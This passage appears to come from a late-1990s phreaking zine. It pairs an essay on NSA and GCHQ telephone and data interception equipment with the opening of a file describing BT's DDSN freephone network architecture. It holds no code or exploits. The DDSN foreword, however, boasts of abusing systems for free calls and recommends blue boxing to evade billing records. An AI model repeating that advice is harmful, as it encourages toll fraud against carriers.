7. Hardcore Telecommunications Covert Interception
==================================================


a) Broadband (High Capacity Multi-Channel) Communications


taken from a 9x file by me (FDM):
http://www.ninex.com/9x/rawtext/9X_TEL.TXT
------------------------------------------------------------------------begin-
To maximise the frequency spectrum available over trunk cables and
international links, the subscribers base band voice signals covering from
300 to 3400 Hz are translated usinga sideband (SSB) modulation to a higher
frequency range suitable for propagation over coaxial cables and radio links.
12 basic channels are modulated on to carriers in the range 64 to 108 KHz
and speed 4 kHz apart. When the lower sideband (LSB) is selected, these form
a 'group' with a bandwidth of 48 kHz, extending from 60 to 108 kHz. Five
groups are then modulated in a similar manner onto carriers spaced at 48 kHz
intervals from 420 to 612 kHz to form a 'supergroup'.

16 supergroups are then LSB-SSB modulated onto carriers spaced by 248 kHz
from 1116 kHz upwards. This results in band of freqencies from 564 kHz
upwards.

To utilise the range bellow 564 kHz, a supergroup is modulated on to a 612
kHz carrier which after selection of LSB is reduced to a band between 60 and
300 kHz. The band between 300 and 564 kHz is filled with another supergroup
in basic form (312 to 552 kHz).

This hierarchy, referred to as 'master' or 'hypergroup', provides a muliplex
(including freqency gaps or guardbands to cater for the characteristics of
practical filters), with an upper frequncy of close to 4 MHz which is easyily
carried over a coax cable.
--------------------------------------------------------------------------end-

Analouge communications are now more or less obsoleet as literaly all
international telecommunications protocols and developments turn digital.
Digital telecoms are based on a method called TDM (Time Division
Multiplexing), this alows multi-channel communications to take place. The
individual conversational channels are first digitised. Information
concerning each channel is then transmitted sequentially rather than
similtaneously, with each link occupying successive time slots. Bell
implement t1 links as part of the majour routng backbones on the US PSTN
which handle 24 phone channels at 1.544 Mbps.

European countrys, such as the UK, operate on slightly higher transmission
speeds as part of the backbone. Instead of T-1 technology, European telco
providers have implemented a different protocol called E-1, which carrys
30 phone channels at 2 Mbps. Most COMINT telecommunications interception
equipment is designed to intercept the European transmission protocols.

New digital telephony techniques are emerging all the time, so Comint
agencies spend alot of time and money investigating each new transmission
technique. One of the latest developments, is the implementation of the
SONET network, which uses synchronised signals which are carried by high
capacity optical fibres, and are supposidly easily extractable by Comint
agencies when high capacity links are involved.

b) Covert Telecommunications Interception Equipment

The NSA contract many organisations to devlop and produce Comint and Sigint
sophisticated interception equipment. Such entitys include Space Systems,
Lockheed, TRW, Raytheon and Bendix. The two majour contracted NSA developers
include AST (Applied Signal Technology) and IDEAS corp, where the directors
are ex NSA employees. Out of all these NSA contracted developers, AST seems
to be the most conspicuous, and describes its equipment as "TEMPEST screened"
Such an organisation was described as "the one stop ECHELON shop".


Extraction of Wideband Signals and Data Analysis
================================================


Where wideband/broadband siganl interception is concerned, they are usually
intercepted from satelite relays and tapped digital multiplexed cables.
One such method used by COMINT agencies is called "wideband extraction",
and involves utilising specialsed Sigint equipment manufactured by the NSA
contracted companies. Interception applications available to COMINT agencies
is as followed: (transponder survey equipment)

o satellite downlink inception
o demodulators
o decoders
o demultiplexers
o microwave radio link analysers
o link survey units
o carrier analysis systems

Satelite data link interception is analysised with AST equipment (AST model
196 transponder charactorisation system) where the basic structure of the
siganl is broken down and analyised. The AST model 195 "the SNAPPER" is a
wideband snapshot analyiser and capture data from extensivly high capicity
systems for extraction. A newly developed system is the AST model 990,
"Flexible Data Acquisition Unit", which is designed to record and analyise
data from 2.488 Gbps SONET OC-48 telecommunications backbones, this device is
fitted with 48 Gigs of memory and is capable of intercepting every packet
of data from multiple internet exchanges. The data that is intercepted is
then stored on RAID HD networks and then later analyised by an AST SONET
257E analyiser.

Their are many steps and procedures that Comint agencies follow when
intercepting such data. First, obviously the data is intercepted at links,
channels and exchanges, then the captured data is broken down into parts so
that multi channel processors can extract then filter the contained messages
such as voice channels, fax communication, and modem data.

" The AST Model 120 multi-channel processor - used by NSA in different
configurations known as STARQUAKE, COBRA and COPPERHEAD - can handle 1,000
simultaneous voice channels and automatically extract fax, data and voice
traffic. Model 128, larger still, can process 16 European E-3 channels (a
data rate of 500 Mbps) and extract 480 channels of interest. The 1999 giant
of AST's range, the Model 132 "Voice Channel Demultiplexer", can scan up to
56,700 communications channels, extracting more than 3,000 voice channels of
interest. AST also provides Sigint equipment to intercept low capacity
VSAT satellite services used by smaller businesses and domestic users.
These systems can be intercepted by the AST Model 285 SCPS processor, which
identifies and extracts up to 48 channels of interest, distinguished between
voice, fax and data. "


Covert Data Processing, Fax Transmission Analysis
=================================================


After the actual transmission interception has taken place, the extracted
data is then analyised by sophistaicated AST developed software with "user
friendly" equipment. AST have developed specialised covert operations data
filtering and extraction software called ELVIRA which opertates on given
specifications such as STRUM. THe software analysises the data and informs
the user of phone call destinations and other signal related information.
The information is then sent back to a remote NSA location in the form of
CSDF (Collected Signals Data Format).

Included in this file is a screenshot of a special software platform designed
by AST called TRAILMAPPER which can operate upto speeds of 2.5 Gbps, and is
designed to be very versatile, in the sense that it can intercept any type
of telecommunications medium (especialy optitical protocols). The trailmapper
software is especialy suited to extracting and analysising data from the new
ATM (Asychronous Transfer Mode) networks which are becoming increasing
popular from implementation from IXCs such as AT&T. AT&T operate a special
ATM network which spans the US, aswell as another ATM network which is
backboned via European locations. COMINT agencies are esspecialy interested
in ATM networks because telco providers offer ATM networking for VPNs, LANS
and international WANS.

AST also offer very specialised equipment and software which is designed to
intercept data from devices used to connect to networks and the internet.
When a telecommunications link is intercepted, a transmission from an
individual using a modem to connect to a network or the internet is easily
extracted and then later anlayised. Aswell as modem interception, FAX
transmissions are also of intellegence interest. A fax transmission can be
intercepted at any point juring its journy over a PSTN, and then later
analysied (or analyised in real time) by AST software such as the Fax Image
Workstation which implements OCR (Optical Charcter Recognition). And if you
think that's scary.. AST also produce a system called "Pager Identification
and Message Extraction" system which automatically collects and processes
data from commercial paging systems. The NSA contracted collective "IDEAS"
also produce specialised covert equipment like the VTP (Video
Teleconferencing Processor) which has the ability to intercept and record
multiple similtanious video, and/or teleconference calls.


Multi Protocol Traffic Analysis Techniqes
=========================================


Covert agencies participate in the art of traffic analysis, where information
from telephone calls is processed and then later studied, depending on the
area of "interest". For example, in such activities, information about the
subjects line is always tranmitted when placing a call, such as the CLID and
the origin of the call via SS7 protocols. Even if voice encryption is used,
the intercepted voice channel still reveals important, and potentialy
sensitive data about the call type:

o CLID
o duration of call
o OPC codes
o destination of call
o freqency of call setups

Text locators: Applications have been built that are designed to intercept
and sift through large arrays and quantitys of data and information. Such
applications are essential to the effective operation of systems such as
ECHELON, as the ECHELON system uses dictionary based applications to filter
important or un-inportant data. Such systems can be ported to act as robots
on most communication protocols, such as IP or voice traffic. Data that has
been intercepted is stored on massive databases for later retreavel, so a
covert agency could implement topic analysis technology to search an
internal database for keywords, ie: "counter attack" or "kill the president".
The NSA currently use a filtering method known as "N-gram" which is designed
to sort through a textual database for any topic, regardless of language.

"To use N-gram analysis, the operator ignores keywords and defines the
enquiry by providing the system with selected written documents concerning
the topic of interest. The system determines what the topic is from the seed
group of documents, and then calculates the probability that other documents
cover the same topic. In 1994, NSA made its N-gram system available for
commercial exploitation. NSA's research group claimed that it could be used
on "very large data sets (millions of documents)", could be quickly
implemented on any computer system and that it could operate effectively "in
text containing a great many errors (typically 10-15% of all characters)".

The "Data Workstation" Comint software system analyses up to 10,000 recorded
messages, identifying Internet traffic, e-mail messages and attachments


Speech Recognition and Voice Interception
=========================================


The UK's GCHQ combined with the US's NSA all conduct research into speech
recognition techniques. Rumours that such technology is used to "pick up" on
certain keywords in telephone speech cannot be classified as concrete fact,
because obviously such organisations would deny this type of communications
monitoring. However, if such a system is deployed by these agencies, they
would be able to gather a higher degree of intellegence information, rather
than picking on areas of suspition. If software is available to the public
that allows a pc user to talk to a computer, then have the computer dictate
what the person is saying into text format, just imagine what the COMINT
agencies have..


Advanced Speech Recognition, Real CallerID
==========================================


GCHQ and the NSA currently have TE464375-1 VADA (Voice Activity Detector and
Analyser) equipment installed inside a GCHQ base in Cheltenham England.
Advanced specch recognition systems can be produced to operate on a mass
scale basis, whereas a subjects voice patterns can be programmed into such
a device, which will then hunt that particular voice patter down on a given
set of telephone channels. System descriptions must be classified "secret" if
NSA "determines that they represent major advances over techniques known in
the research community".


8. Closing, Summerisation

This article only covers a very limited set of covert communications
interception techniques, their are many more out their. The COMINT and
SIGINT organisations are very resourcfull, in the sense that they have vast
funds to back up research into covert communications devices. The idea that
technology exists that can distinguish voice patterns over telephone channels
it particulary scary, and in a sense, a complete infringment of the "private"
service that the telco providers offer. The fact is, such technologys do
exist, and can (or have) been implemented. Telecommunications equipment is
intended for the interception of "hotspot" information such as military and
diplomatic communications, it is however strange that such systems are
designed to be attached to majour telecommunications backbones (Opticaly
Derived) to "filter" the imporatant information. Its a case of whether or
not you "trust" the NSA or GCHQ or whatever to only intercept real
intellegence information, or whether they'll adopt the "big brother" approach
and monitor ALL communications. Either way, they are unlikely to admit to
any such activitys, the fact is, they have the technology and the ability to
monitor all majour communications protocols.. Do you trust them? Do they
trust you? Its all in the name of "National Security"...

Well, thats it for this file, I hope you enjoyed it. Werd/Shouts to:

D4RKCYDE, 9x, b4b0, kelticphr0st, jasun, zomba, bodie, gr1p, shadowx, lowtek,
psyclone, shylock, digiphreq, downtime, elaich, oxidation, substance, tip,
pbxphreak, lusta & nou, force, microwire, oclet, knight, siezer, devious.

------------------------------------------------------------------------------


B L 4 C K M 1 L K
teleph0nics

FUCKIN HARDCORE, BABY

http://hybrid.dtmf.org/


------------------------------------------------------------------------------


Type Bits/KeyID Date User ID
pub 2048/86298E99 1999/09/18 hybrid <hybrid@dtmf.org>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQENAzfjBzcAAAEIANaRNlbj/1FQo3V6JK4L+lziSwsXh/axd7trkB9lP2Sxwv/U
F7/avmxY3PhjjpqG3o85z2D1qduVSZcXoN6iF/JiCMqAU2nsfmZwvO9U7WZX5Xv/
wEUuqDAt59YKLqSjpZXue/ROZJLSAJXbhbOEZdq24gzDMAvCmqJJWk/7QdFoJYl1
0aszUPTyw6JA0ys+K9YRyiYAPe4RvJV0VaImP5uNaf8w+H1znTL8dUmUYqSbbRx2
0p5AJTxPTYsNWRg9LopF2qVIOf8SGpvJTCfsLoZxfmezUBWv5nrSU6H9xlFGdlJK
RezXi8QYGEyljAZODt930r9iS9XxckKelIYpjpkABRG0GGh5YnJpZCA8aHlicmlk
QGR0bWYub3JnPokBFQMFEDfjBzhyQp6UhimOmQEBC70H/R+rZfFef3PzGO0ez9ct
dNq7lTUkuStXmqpJhHNSuNEAx9b5q2DjKS/LJQYn+WymfA0mSeGaYL8yJ7wroh1N
JHySe266qEjov6R/WjUk1f/OEz38UCfzln7MtLykhk9bnWC745uwTiXAdU6hUzUN
J45opUpWwAQ843MWypN3Mm4q7UnBMAlcUXyyWEWpZrc9lxSaZDyw9acEZLKqDgwB
m6fMiyq4QXeoVI4HbLHiZFDll7+XE5HripXyKXU0qhACcr7JbM5jYWrmob9XL94r
3HAiOfJQbQIC25D3Cbf++ilwLsTdVR6bCFsiw3YPEK9/v0WTZHAIr8ftXl2C2OjG
Q0s=
=8jkO
-----END PGP PUBLIC KEY BLOCK-----

.
:
|
+-+[ DDSN intellegent network ]+---> by kelticphrost

  
<-----------------------+
+-+[ D4RKCYDE ]+---> <-----------------------+
|
:
.

_\|/_ [ GBH ] Ghwan Burnin Haxorz [ GBH ] _\|/_

///////////////////////////////////////////////////////////////////////////
// //
// DDSN Intelligent Network //
// //
// A full rundown of our LinkLine (0800) and LoCall (0345) Services //
// //
// Presented in full By Keltic Phr0st //
// //
///////////////////////////////////////////////////////////////////////////

"...the most sophisticated network of its type ouside North America."

Steve Webster, BT ; DDSN Development Team

FOREWORD
========
This article shook me up very badly after reading it. At the time I'd been
working extensively on a Unix Box in 896, and abusing the fuck out of P******
for global calls in 892. Not only this, but a host of other activities, which
are probably nestling on some AMA tape somewhere, waiting to be looked at...
<Gulp> . Its not all doom and gloom though - AMA has yet to pinpoint Blue
Boxing for some reason, and in so far this would seem to be the only real
'safe' method of putting your calls away for free alongside cellular, I
reccomend you start to view it in a new light.

Anyway, after that suitably apocalyptic snippet, here we go.

///// ///// ///// ///// ///// ///// ///// ///// ///// /////

INTRODUCTION
============
In 1983, British Telecom identified a major market potential for automatic
freephone and premium rate services. An Analogue Network, with extended
register translation and call charging facilities overlayed on the PSTN
was proposed as an interim solution. The analogue derived services network,
consisting of eight fully-interconnected switching nodes, was brought into
limited public service in April 1985 and full public service in July 1985.

The LinkLine 0800 service permits calling customers to make calls
free of charge while callers to LinkLine 0345 service numbers are charged
at the local call rate irrespective of distance. The balance of the call
charge is billed to the called customer known as the Service Provider (SP).

In keeping with its buisness modernisation programmes, British Telecom
awarded a contract to AT&T for the supply and installation of a digital
derived services network (DDSN), comprising 5ESS-PRX digital switches to
be implemented in two distinct phases:

Phase 1, which was completed in 1988, involved the supply of eight digital
units, utilising CCITT No. 7 common-channel signalling, as replacements for
their analogue units (Figure 1). In addition, two new digital units were
provided in London.


Figure 1 : Digital Derived Services Network Interconnection

ÚÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿
³ DLE ³ ³ DLE ³
ÀÄÄÂÄÄÙ ÀÄÄÂÄÄÙ
³ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³
ÚÄÄÁÄÄÄ¿ º SP DIGITAL DERIVED SP º ÚÄÄÄÁÄÄ¿
³ DMSU ³ º Â SERVICES NETWORK Â º ³ DMSU ³
ÀÄÄÂÄÄÄÙ º ³ ³ º ÀÄÄÄÂÄÄÙ
³ º ³ ³ º ³
³ º ³ ³ º ³
³ º ÚÄÄÄÁÄÄÄ¿ ÚÄÄÄÁÄÄÄ¿ º ³
ÀÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄÙ
º ÀÄÄÄÂÄÄÂÙ ÀÂÄÄÂÄÄÄÙ º
º ³ ³ ÚÄÄÄÙ ³ º
º ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄijÄÄÄ¿ ³ º
º ³ ³ ³ ³ º
º ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ º
º ÚÄÄÄÁÄÄÁ¿ ÚÁÄÄÁÄÄÄ¿ º
ÚÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄ¿
³ º ÀÄÄÄÂÄÄÄÙ ÀÄÄÄÂÄÄÄÙ º ³
³ º ³ (Only 4 centres ³ º ³
³ º ³ shown for clarity) ³ º ³
ÚÄÄÁÄÄÄ¿ º ³ ³ º ÚÄÄÄÁÄÄ¿
³ AMSU ³ º Á Á º ³ AMSU ³
ÀÄÄÂÄÄÄÙ º SP SP º ÀÄÄÄÂÄÄÙ
³ º º ³
³ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ³
ÚÄÄÁÄÄ¿ ÚÄÄÁÄÄ¿
³ ALE ³ ³ ALE ³
ÀÄÄÄÄÄÙ EXISTING PUBLIC SWICHED ÀÄÄÄÄÄÙ
TELEPHONE NETWORK



AMSU Analogue Main Switching Unit
ALE Analogue Local Exchange
DDSSC Digital Derived Services Switching Centre
DLE Digital Local Exchange
DMSU Digital Main Switching Unit
SP Service Provider



Phase 2 makes provision for an advanced freephone service using an
intelligent network architecture.

INTELLIGENT NETWORK CONCEPT
===========================
In a traditional telecommunications network, call control 'intelligence'
resides in the call processing software in its switching nodes. One disadvan-
tage of this approach for some services is that customer-specific data has to
be replicated in each node. As features become more sophisticated, then
system complexity increases. In the DDSN Intelligent Network, specialised
customer feature and routing information is held centrally in a network
database which can be accessed by all switching nodes using dedicated
datalinks and common-channel signalling (Figure 2). These signalling datalinks
are used to pass requests for call handling information to the database and
return instructions to the originating switching node.

Figure 2 : Network DataBase Concept

ÚÄÄÄÄÄÄÄÄÄÄ¿
³ NETWORK ³
/³ DATABASE ³\
/ ÀÄÄÄÄÄÄÄÄÄÄÙ \
ACCESS TO/FROM ALL DDSN SWITCHES
/ | \
/ | \
ÚÄÄÄÄÄÄÄÄ¿ | \ ÚÄÄÄÄÄÄÄÄ¿
³ DDSN ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSN ³
³ SWITCH ³ ³ SWITCH ³
ÀÄÄÄÂÄÄÂÄÙ ÀÂÄÄÂÄÄÄÄÙ
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ Ú³Ù ³
³ ³³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³
ÚÄÄÄÁÄÄÁÄ¿ ÚÄ¿ ÚÁÄÄÁÄÄÄÄ¿
³ DDSN ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄijÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSN ³
³ SWITCH ³ ³ ³ ³ SWITCH ³
ÀÄÄÄÄÄÄÄÄÙ ÀÂÙ ÀÄÄÄÄÄÄÄÄÙ
³
³
SPEECH AND SIGNALLING


An Intelligent network centralised call management fucntion allows
an economical implementation of advanced features, simplifies administration
of complex services and assures optimum use of network-wide, rather than
switch-based, resources.

DDSN INTELLIGENT NETWORK ARCHITECTURE
=====================================
Three network elements are concerned with call processing for service
providers with advanced features:

o Action Control Point (ACP)
o Network Control Point (NCP)
o Network Services Complex (NSC)

The network architecture is illustrated in Figure 3, and the role of each
of the elements will become apparent as the call processing aspects are
explained.

Figure 3 : DDSN Intelligent Network Architecture

ÚÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿
³ NSC ³ ³ NSC ³ ³ NSC ³
ÀÄÂÄÂÄÙ ÀÄÄÂÄÄÙ ÀÄÄÂÄÄÙ
C T ³ ³
7 T ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ´
N T ³ C7NA ³ ³ C7NA ³
A ³ ³ÚÄÄÄÄÄÄÄÄÄÄÄÄijÄÄÙ ³
³ ³ ³³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿³
ÚÁÄÁÄÄÄÄÄÄÄÄÄÁÁÄ¿ ÚÄÁÁÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÄÄTÄÄTÄÄTÄ´ ÃÄÄÄÄÄÄÄÄÄC7NAÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄTÄÄÄTÄÄÄTÄÄ
³ ACP/STEP/HOST ÃÄÄÄTÄÄÄÄÄÄÄTÄÄÄÄÄÄÄÄTÄÄÄ´ ACP / STEP ³
ÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄC7BTÄÄÄÄÄ
(PSTN) ÀÂÄÂÄÂÄÄÄÄÄÄÄÂÂÂÙ ÀÂÂÂÄÄÄÄÄÄÄÂÄÂÄÂÙ (PSTN)
C V C ³³ÀÄÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ C V C
³ O ³ ³ÀÄÄÄÄÄÄÄVOICE TRUNKSÄÄÄÄÄÄÄÄÄ¿³ ³ O ³
7 I 7 ÀÄÄÄÄÄÄÄÄÄÄÄÄC7NAÄÄÄÄÄÄÄÄÄÄÄÄ¿³³ 7 I 7
³ C ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄij³³ ³ C ³
N E B ³ÚÄÄÄÄÄÄÄVOICE TRUNKSÄÄÄÄÄÄÄij³³ N E B
³ ³ ³ ³³ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij³³ ³ ³ ³
A T T ³³³ ³³³ A T T
³ R ³ ³³³ ³³³ ³ R ³
³ U ³ ³³³ ³³³ ³ U ³
³ N ³ ³³³ ³³³ ³ N ³
³ K ³ ³³³ ³³³ ³ K ³
³ S ³ ³³³ ³³³ ³ S ³
ÚÁÄÁÄÁÄÄÄÄÄÄÄÁÁÁ¿ ÚÁÁÁÄÄÄÄÄÄÄÁÄÁÄÁ¿
ÄÄTÄÄTÄÄTÄ´ ÃÄÄÄTÄÄÄÄÄÄÄTÄÄÄÄÄÄÄÄTÄÄÄ´ ÃÄTÄÄÄTÄÄÄTÄÄ
³ ACP ³ ³ ACP / HOST ³
ÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄC7BTÄÄÄÄÄ
(PSTN) ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÂÄÂÙ (PSTN)
C T
7 T
N T
ÄTÄTÄTÄ = VOICE TRUNKS A ³
³ ³
ÚÄÁÄÁÄ¿
ACP ACTION CONTROL POINT ³ NSC ³
STEP SIGNAL TRANSFER AND END POINT ÀÄÄÄÄÄÙ
C7BT CCITT #7 SIGNALLING (BT)
NCP NETWORK CONTROL POINT
NSC NETWORK SERVICES COMPLEX
C7NA C7 NORTH AMERICAN

(Only four switching nodes are shown for simplicity)



Action Control Point
--------------------
The Action Control Points (ACPs) are the 5ESS-PRX Switching Nodes,
which serve as transit and terminating nodes for DDSN traffic. All ACPs are
fully interconnected by digital line systems and CCITT #7 (BT) common channel
signalling. The CCITT #7 (BT) signalling links are used exclusively for
setting up speech paths both within the DDSN and between the DDSN and the
PSTN.

A Second totally independent common channel signalling network,
utilising a proprietary form of #7 signalling (C7 North American), is used
for transporting non-circuit related signalling methods between the ACPs and
the Network Control Points (NCPs). This network is used only for advanced
feature calls. Two of the ACPs have been nominated as a signal transfer
and end point (STEP) and funnel the signalling traffic from the remaining
ACPs to the NCPs. ACPs load share the C7NA signalling messages across both
STEPs in the ACP-to-NCP direction, and the NCPs load share the signalling
messages across both STEPs in the reverse direction.

Network Control Point
---------------------
The Network Control Point (NCP) constitutes the core of the intelligent
network and holds the data defining the treatment for specific advanced
feature calls. NCPs are always provided in mated pairs.

Each NCP consists of a duplex processor, duplicated hard discs for
data storage, tape drives and interfaces to the other network elements
through a Local Area Network. This network, called the Common Network
Interface, consists of the signalling terminals for the C7NA links from the
STEP nodes and two peripheral controllers which communicate with the duplex
processor. The common network interface ring (Figure 4) is automatically
reconfigured under fault conditions to isolate the faulty section.

Figure 4 : Common Network Interface Ring

ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿
³ ACP/STEP ³ ³ ACP/STEP ³
ÀÄÄÂÄÄÄÄÂÄÄÙ ÚÄÄÄÄÄÄ¿ ÀÄÄÂÄÄÄÄÂÄÄÙ
ÚÄijÄÄÄijĿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄ<ÄÄÄÄÄÄ¿ ³ ³
ÃÄÄÄÄÄÄÄÄÄÙ ³ ³ RPCN ³ ³ ³ ³
³ ³ 7 ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄ>ÄÄÄÄ¿ ³ ³ ³
³ ³ N ³ ³ ÀÄÄÄÂÄÄÙ ³ ³ ³ ³
³ ³ A ÚÁÄÄÁ¿ ³ ³ ³ ³ ³
³ C ÀÄÄÄÄÄ´ LN ³ ³ ³ ³ ³ ³
³ 7 ÀÂÄÄÂÙ ³ ³ ³ C ³
³ N ³ ³ ³ ³ ³ 7 ³
³ A ³ ³ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ³ ³ N ³
³ ³ ÚÁÄÄÁ¿ ³ CENTRAL ³ ÚÁÄÄÁ¿ A C
³ ÀÄÄÄÄÄÄÄÄÄÄ´ LN ³ ³ PROCESSOR ³ ³ LN ÃÄÄÄÄÄÙ 7
³ ÀÂÄÄÂÙ ÀÄÄÄÄÄÂÄÄÄÄÄÙ ÀÂÄÄÂÙ N
³ ³ ³ ³ ³ ³ A
³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ÚÁÄÄÁ¿ ³
³ SIGNALLING ³ ³ ³ ³ LN ÃÄÄÄÄÄÄÄÄÄÄÙ
ÀÄ LINKS ³ ³ RING 1 ÚÄÄÄÁÄÄ¿ ÀÂÄÄÂÙ
³ ÀÄÄÄÄ<ÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ ³ RPCN ³ ³
ÀÄÄÄÄÄÄÄÄ>ÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
RING 0 ÀÄÄÄÄÄÄÙ

LN LINK NODE
RPCN RING PERIPHERAL CONTROLLER NODE


Advanced freephone call handling data is duplicated both within and
and between each NCP in the mated pair. Call routing queries from the ACPs
are balanced between the two NCPs by designating specific dialled codes to
each NCP, and the decision on which NCP to query is taken at the ACP where
the call entered the DDSN network. Although data is held on both NCPs,
the secondary NCP is only accessed if the primary is not available. Under
these conditions, the remaining NCP is capable of handling 100% of the load.
This architecture virtually guarantees 100% service availability.

Automatic network management controls initiated by the NCP maintain
the integrity of the intelligent network under overload conditions by sending
code gapping messages instructing the ACPs to throttle back on the number of
queries being forwarded to the NCP and defining the treatment for failed
calls.


Network Services Complex
------------------------
The Network services complex (NSC) provides the capability to give
callers standard or customised interactive spoken information pertaining
to the number called, such as, call prompting, courtesy response and
call queing announcements. During or after a call prompting announcement
the caller may communicate with the NSC by keying-in appropriate digits
on an MF keyphone or keypad. The NSC can collect up to 15 digits which it
forwards, via its host ACP, to the NCP via a C7NA common channel signalling
link.

Initially, two NSCs loaded with the same announcements have been
provided in the DDSN intelligent network and are co-located with the NCPs.
Each NSC can handle 60 simultaneous calls and provide up to 2000 different
announcements which are stored on triplicated moving head discs. In the
even of an NSC failure, calls requiring these features are routed to the
remaining NSC.

The NSC architecture is given in Figure 5.

Figure 5 : Network Services Complex Architecture

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ACP / HOST ³
ÀÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÙ
T C
³ 7
T N
³ A
T ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄ¿ ³ SIGNALLING ³
³ TIME-SLOT ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ LINK ³
³ INTERCHANGE ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ TERMINAL ³
ÀÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÙ ³ ÀÄÄÄÄÄÄÂÄÄÄÄÄÙ
³ ³ ³ ³
³ ³ ³ ³
³ ³ ³ ³
³ ³ ³ ³
³ ³ ³ ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³
³ ³ ³ ÚÄÄÄÄÄÄÁÄÄÄÄÄÄ¿
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ PROCESSOR ³
³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÁÄÄÄÄÄÄÁÄÄ¿ ³ ³
³ DATA ³ ³ ³
³ STORAGE ³ ³ ³
³ UNITS ³ ³ ³
ÀÄÄÄÄÄÂÄÄÄÄÄÙ ÚÄÄÁÄÄÄÄÄÁÄ¿
ÚÄÄÄÁÄÄÄ¿ ³ TONE ³
³ DISCS ³ ³ RECEIVER ³
ÀÄÄÄÄÄÄÄÙ ³ UNITS ³
ÀÄÄÄÄÄÄÄÄÄÄÙ


ADVANCED FEATURES
=================
The DDSN Intelligent Network will permit a range of new features
to be offered as Advanced LinkLine to LinkLine service providers. These
include (Advanced LinkLine feature name is in brackets) :

o Time and Day Routing - The routing of calls can be made dependant on the
time of day, day of week and week of the year. (TimeLink / DayLink)

o Call Allocator - This provides the capability to route incoming calls
proportionally to a number of service provider destinations and / or
announcements. (DistributionLink)

o Call Queuing - This provides queues for calls at the originating ACP
when all available lines to a service provider destination are engaged.
An announcement informs the caller of the call status. (QueueLink)

o Call Barring - This feature allows service providers to define the
treatment of a particular Advanced LinkLine number based on where the
call origniated in the PSTN. (AreaLink)

o Alternative Destination on Busy - When a busy condition is encountered
and no queuing is define, an alternative destination may be chosen
automatically. (BusyLink)

o Call Prompter - Announcements will prompt callers to enter digits on
their telephone set in order to realise caller interactive routing.
(SelectLink)

o Courtesy Response - If no destination can be reached, for example, due
to an unattended office, a pre-defined standard or customised announcement
may be played. (CourtesyLink)

o Command Routing - This feature allows the service provider to instruct
British Telecom to redirect calls to a preset alternate set of
destinations. This is intended for emergency and other contingency
